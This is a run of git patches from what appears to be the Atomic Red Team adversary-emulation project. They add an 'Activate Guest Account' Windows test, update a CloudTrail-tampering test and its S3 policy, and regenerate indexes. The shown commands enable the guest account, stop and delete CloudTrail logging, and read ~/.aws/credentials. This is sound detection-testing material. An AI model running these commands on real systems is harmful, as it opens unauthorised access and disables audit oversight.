+            "Effect": "Allow",
+            "Principal": {
+                "Service": "cloudtrail.amazonaws.com"
+            },
+            "Action": "s3:GetBucketAcl",
+            "Resource": "arn:aws:s3:::redatomic-test"
+        },
+        {
+            "Sid": "AWSCloudTrailWrite20150319",
+            "Effect": "Allow",
+            "Principal": {
+                "Service": "cloudtrail.amazonaws.com"
+            },
+            "Action": "s3:PutObject",
+            "Resource": "arn:aws:s3:::redatomic-test/AWSLogs/*",
+            "Condition": {
+                "StringEquals": {
+                    "s3:x-amz-acl": "bucket-owner-full-control"
+                }
+            }
+        }
+    ]
+}

From b4c10e2fa8193ef21c9eb36fe74689346e57e901 Mon Sep 17 00:00:00 2001
From: DS <31036535+security-geek@users.noreply.github.com>
Date: Thu, 12 Aug 2021 12:27:45 +1000
Subject: [PATCH 12/39] Update T1078.001.yaml (#1589)

---
 atomics/T1078.001/T1078.001.yaml | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml
index 3fe801b2..fb3d2230 100644
--- a/atomics/T1078.001/T1078.001.yaml
+++ b/atomics/T1078.001/T1078.001.yaml
@@ -38,3 +38,19 @@ atomic_tests:
       if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
     name: command_prompt
     elevation_required: true
+
+- name: Activate Guest Account
+  description: |
+    The Adversaries can activate the default Guest user. The guest account is inactivated by default
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+     net user guest /active:yes
+    cleanup_command: |
+     net user guest /active:no
+    name: command_prompt
+    elevation_required: true
+
+
+

From d981e845fd3702cb703d3ec7756d2ab284945a7b Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Thu, 12 Aug 2021 02:28:06 +0000
Subject: [PATCH 13/39] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1078.001/T1078.001.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml
index fb3d2230..a5e8ad5d 100644
--- a/atomics/T1078.001/T1078.001.yaml
+++ b/atomics/T1078.001/T1078.001.yaml
@@ -40,6 +40,7 @@ atomic_tests:
     elevation_required: true
 
 - name: Activate Guest Account
+  auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
   description: |
     The Adversaries can activate the default Guest user. The guest account is inactivated by default
   supported_platforms:
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 04ced245..aa96fbf8 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -761,3 +761,4 @@ c4ae0701-88d3-4cd8-8bce-4801ed9f97e4
 441b1a0f-a771-428a-8af0-e99e4698cda3
 eeb9751a-d598-42d3-b11c-c122d9c3f6c7
 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+aa6cb8c4-b582-4f8e-b677-37733914abda

From 370062439e856327c4be72afbd5834438092433f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 12 Aug 2021 02:28:11 +0000
Subject: [PATCH 14/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  4 ++
 atomics/Indexes/Indexes-CSV/windows-index.csv |  4 ++
 atomics/Indexes/Indexes-Markdown/index.md     |  4 ++
 .../Indexes/Indexes-Markdown/windows-index.md |  4 ++
 atomics/Indexes/index.yaml                    | 68 +++++++++++++++++++
 atomics/T1078.001/T1078.001.md                | 34 ++++++++++
 6 files changed, 118 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index e9380dbe..2b76f2d9 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -144,6 +144,7 @@ privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/cront
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -268,6 +269,7 @@ defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
@@ -544,6 +546,7 @@ persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ fold
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+persistence,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -914,6 +917,7 @@ exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
 initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 3a96f7e7..79e806ce 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -98,6 +98,7 @@ privilege-escalation,T1546.001,Change Default File Association,1,Change Default
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -181,6 +182,7 @@ defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255
 defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
@@ -371,6 +373,7 @@ persistence,T1546.001,Change Default File Association,1,Change Default File Asso
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+persistence,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
@@ -627,6 +630,7 @@ lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Man
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
 initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
+initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 12dbc257..68898e7c 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -264,6 +264,7 @@
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -488,6 +489,7 @@
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
@@ -928,6 +930,7 @@
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
   - Atomic Test #1: Create a new Windows domain admin user [windows]
   - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -1660,6 +1663,7 @@
 - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a3558cd7..d0f286c9 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -199,6 +199,7 @@
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -352,6 +353,7 @@
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
   - Atomic Test #2: Certutil Rename and Decode [windows]
@@ -666,6 +668,7 @@
   - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
   - Atomic Test #1: Create a new Windows domain admin user [windows]
   - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
@@ -1151,6 +1154,7 @@
 - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
   - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
+  - Atomic Test #2: Activate Guest Account [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 4cfe28ae..a7d4214d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -11730,6 +11730,23 @@ privilege-escalation:
           if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
+    - name: Activate Guest Account
+      auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
+      description: 'The Adversaries can activate the default Guest user. The guest
+        account is inactivated by default
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: 'net user guest /active:yes
+
+'
+        cleanup_command: 'net user guest /active:no
+
+'
+        name: command_prompt
+        elevation_required: true
   T1078.002:
     technique:
       external_references:
@@ -21955,6 +21972,23 @@ defense-evasion:
           if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
+    - name: Activate Guest Account
+      auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
+      description: 'The Adversaries can activate the default Guest user. The guest
+        account is inactivated by default
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: 'net user guest /active:yes
+
+'
+        cleanup_command: 'net user guest /active:no
+
+'
+        name: command_prompt
+        elevation_required: true
   T1578.003:
     technique:
       external_references:
@@ -40439,6 +40473,23 @@ persistence:
           if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
+    - name: Activate Guest Account
+      auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
+      description: 'The Adversaries can activate the default Guest user. The guest
+        account is inactivated by default
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: 'net user guest /active:yes
+
+'
+        cleanup_command: 'net user guest /active:no
+
+'
+        name: command_prompt
+        elevation_required: true
   T1136.002:
     technique:
       created: '2020-01-28T14:05:17.825Z'
@@ -68890,6 +68941,23 @@ initial-access:
           if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
+    - name: Activate Guest Account
+      auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
+      description: 'The Adversaries can activate the default Guest user. The guest
+        account is inactivated by default
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: 'net user guest /active:yes
+
+'
+        cleanup_command: 'net user guest /active:no
+
+'
+        name: command_prompt
+        elevation_required: true
   T1078.002:
     technique:
       external_references:
diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md
index 250f7d3f..e8586c71 100644
--- a/atomics/T1078.001/T1078.001.md
+++ b/atomics/T1078.001/T1078.001.md
@@ -8,6 +8,8 @@ Default accounts are not limited to client machines, rather also include account
 
 - [Atomic Test #1 - Enable Guest account with RDP capability and admin privileges](#atomic-test-1---enable-guest-account-with-rdp-capability-and-admin-privileges)
 
+- [Atomic Test #2 - Activate Guest Account](#atomic-test-2---activate-guest-account)
+
 
 <br/>
 
@@ -58,4 +60,36 @@ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentCon
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Activate Guest Account
+The Adversaries can activate the default Guest user. The guest account is inactivated by default
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** aa6cb8c4-b582-4f8e-b677-37733914abda
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+net user guest /active:yes
+```
+
+#### Cleanup Commands:
+```cmd
+net user guest /active:no
+```
+
+
+
+
+
 <br/>

From cbd8ea2e6022d6152555b7236553f320c75bc469 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy <esanya.araveti@kudelskisecurity.com>
Date: Thu, 12 Aug 2021 09:04:10 +0530
Subject: [PATCH 15/39] updated cleanup command

---
 atomics/T1562.008/T1562.008.yaml  |  3 ++-
 atomics/T1562.008/src/policy.json | 28 ++++++++++++++++++++++++++++
 2 files changed, 30 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1562.008/src/policy.json

diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
index ccddbecf..c6689e43 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1562.008/T1562.008.yaml
@@ -26,7 +26,7 @@ atomic_tests:
       prereq_command: |
         cat ~/.aws/credentials | grep "default"
         aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
-        aws s3api put-bucket-policy --bucket redatomic-test --policy file://$PathToAtomicsFolder/T1562.008/policy.json
+        aws s3api put-bucket-policy --bucket redatomic-test --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
       get_prereq_command: |
         echo Please install the aws-cli and configure your AWS defult profile using: aws configure
   executor:
@@ -35,6 +35,7 @@ atomic_tests:
        aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
        aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
        aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
+    cleanup_command: |   
        aws s3 rb s3://#{s3_bucket_name} --force 
     name: sh
     elevation_required: false
diff --git a/atomics/T1562.008/src/policy.json b/atomics/T1562.008/src/policy.json
new file mode 100644
index 00000000..ac55e733
--- /dev/null
+++ b/atomics/T1562.008/src/policy.json
@@ -0,0 +1,28 @@
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "AWSCloudTrailAclCheck20150319",
+            "Effect": "Allow",
+            "Principal": {
+                "Service": "cloudtrail.amazonaws.com"
+            },
+            "Action": "s3:GetBucketAcl",
+            "Resource": "arn:aws:s3:::redatomic-test"
+        },
+        {
+            "Sid": "AWSCloudTrailWrite20150319",
+            "Effect": "Allow",
+            "Principal": {
+                "Service": "cloudtrail.amazonaws.com"
+            },
+            "Action": "s3:PutObject",
+            "Resource": "arn:aws:s3:::redatomic-test/AWSLogs/*",
+            "Condition": {
+                "StringEquals": {
+                    "s3:x-amz-acl": "bucket-owner-full-control"
+                }
+            }
+        }
+    ]
+}

From b1b3ec86bf845c9a301c972e61fa599deb519e08 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy <88440780+esanyaCode@users.noreply.github.com>
Date: Thu, 12 Aug 2021 09:06:22 +0530
Subject: [PATCH 16/39] Delete policy.json

---
 atomics/T1562.008/policy.json | 28 ----------------------------
 1 file changed, 28 deletions(-)
 delete mode 100644 atomics/T1562.008/policy.json

diff --git a/atomics/T1562.008/policy.json b/atomics/T1562.008/policy.json
deleted file mode 100644
index ac55e733..00000000
--- a/atomics/T1562.008/policy.json
+++ /dev/null
@@ -1,28 +0,0 @@
-{
-    "Version": "2012-10-17",
-    "Statement": [
-        {
-            "Sid": "AWSCloudTrailAclCheck20150319",
-            "Effect": "Allow",
-            "Principal": {
-                "Service": "cloudtrail.amazonaws.com"
-            },
-            "Action": "s3:GetBucketAcl",
-            "Resource": "arn:aws:s3:::redatomic-test"
-        },
-        {
-            "Sid": "AWSCloudTrailWrite20150319",
-            "Effect": "Allow",
-            "Principal": {
-                "Service": "cloudtrail.amazonaws.com"
-            },
-            "Action": "s3:PutObject",
-            "Resource": "arn:aws:s3:::redatomic-test/AWSLogs/*",
-            "Condition": {
-                "StringEquals": {
-                    "s3:x-amz-acl": "bucket-owner-full-control"
-                }
-            }
-        }
-    ]
-}

From 74de7af42f0b9e7270073a2e5ebfa906081aa61a Mon Sep 17 00:00:00 2001
From: Jose Enrique Hernandez <josehelps@gmail.com>
Date: Mon, 16 Aug 2021 09:54:02 -0400
Subject: [PATCH 17/39] adding new platform layer generation (#1599)

---
 .../art-navigator-layer-azure-ad.json         |    1 +
 .../art-navigator-layer-containers.json       |    1 +
 .../art-navigator-layer-google-workspace.json |    1 +
 .../art-navigator-layer-iaas-aws.json         |    1 +
 .../art-navigator-layer-iaas-azure.json       |    1 +
 .../art-navigator-layer-iaas-gcp.json         |    1 +
 .../art-navigator-layer-iaas.json             |    1 +
 .../art-navigator-layer-office-365.json       |    1 +
 atomics/Indexes/index.yaml                    | 3562 ++++++++---------
 bin/generate-atomic-docs.rb                   |   95 +-
 10 files changed, 1882 insertions(+), 1783 deletions(-)
 create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
 create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
 create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
 create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
 create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
 create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
 create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
 create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
new file mode 100644
index 00000000..26b3b6a1
--- /dev/null
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
@@ -0,0 +1 @@
+{"version":"4.1","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
new file mode 100644
index 00000000..5dc65d44
--- /dev/null
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
@@ -0,0 +1 @@
